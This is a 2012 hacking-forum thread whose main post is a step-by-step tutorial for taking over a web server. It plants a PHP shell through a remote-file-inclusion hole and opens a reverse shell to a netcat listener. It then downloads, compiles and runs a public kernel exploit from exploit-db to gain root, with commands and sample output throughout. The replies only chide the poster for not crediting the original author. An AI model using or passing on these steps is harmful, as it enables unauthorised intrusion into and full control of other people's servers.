+- 0Day Forums (https://0day.red)
+-- Forum: Hacking & Exploits (https://0day.red/Forum-Hacking-Exploits)
+--- Forum: Hacking Tutorials (https://0day.red/Forum-Hacking-Tutorials)
+--- Thread: Rooting Tutorial (/Thread-Rooting-Tutorial)
Rooting Tutorial - accompanying860239 - 03-29-2012
we need?
-RFI Vulnerable Script
-PHP Shell
-Netcat
-Brains
First of all, we need to get a shell on a site.
For this tutorial i will be using MulCi Shell.
So, once you have it on a site, go to the 'Backdoor Host' tab and forward a port.
Now, go to the 'Back Connect' tab and insert the following settings:
1- Your IP Address.
2-The port you forwarded.
Now, go on CMD and type in:cd 'Path To Your Netcat.exe' and then you need to make netcat listen to the port you forwarded.To do this, type:nc -l -n -v -p port
It looked like this for me:
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.
C:\FeAR>cd C:\
C:\>cd WINDOWS
C:\WINDOWS>nc -l -n -v -p 4444
listening on [any] 4444 ...
Now, when you have netcat listening to the port you forwarded, click 'Connect'.
When your connected, type 'whoami'.You shouldnt have root.
Now, to find an exploit to root the box, you need to know whats the kernel version.To do this, just type 'uname -a'.
It should look something like this:
Code:
Linux linux1.dmehosting.com 2.6.17-92.1.10.el5PAE #1 SMP Tue Aug 5 08:14:05 EDT 2008 i686
Now, we go on exploit-db.com and we will look for '2.6.17'.
Code:
hhttp://www.exploit-db.com/exploits/5092/
Now, we type 'wget
[To see links please register here]
on the netcat window.Code:
wget
[To see links please register here]
So the exploit works, you must compile it in the server(gcc) and execute it via exploit(-o).
To do this we type 'gcc 5092 -o exploit'.
Code:
gcc 5092 -o exploit
5092- After the url path.http://www.site.com/5092.
exploit- Output name.
Now you can execute your exploit by typing './exploit'
Wait for the exploit to finish running and type root again.
It should output in something like this:
Code:
uid=0(root) gid=0(root) groups=500(apache)
This means you have successfully rooted the box .
There are more ways to do this, this is the way I usually do it
RE: Rooting Tutorial - hardened426 - 03-30-2012
Give credit:
[To see links please register here]
(He prob took it from someone else too.)RE: Rooting Tutorial - c564 - 03-30-2012
Thank you shadow for the notification. Also priceshama thanks for posting but please credit your topic to the original poster. 10% Warning given.
RE: Rooting Tutorial - couch33240 - 03-31-2012
sory bro next time i will give credit thankx